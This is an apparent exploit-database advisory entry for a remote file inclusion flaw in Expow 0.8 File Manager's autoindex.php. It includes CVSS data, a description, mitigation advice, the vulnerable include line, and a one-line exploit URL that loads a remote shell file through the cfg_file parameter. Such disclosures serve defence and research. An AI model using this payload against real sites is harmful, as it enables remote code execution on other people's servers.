Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability

vendor:

Expow 0.8 File Manager

by:

mdx

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Expow 0.8 File Manager

Affected Version From: 0.8

Affected Version To: 0.8

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability

This exploit allows an attacker to include a remote file by manipulating the 'cfg_file' parameter in the 'autoindex.php' script of Expow 0.8 File Manager. By providing a remote file URL in the 'cfg_file' parameter, the attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Expow File Manager or apply any available patches. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.

Source

Exploit-DB raw data:

Expow 0.8 File manager  Autoindex.php (cfg_file) Remote File Inclusion Vulnerability
__________________________________________________________________________
found by : mdx
--------------------------------------------------------------------------
Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218
--------------------------------------------------------------------------
file name : autoindex.php
__________________________________________________________________________
Ãncluded line ;

  if (!include($cfg_file))

__________________________________________________________________________
Exploit :

http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt?

# milw0rm.com [2007-04-12]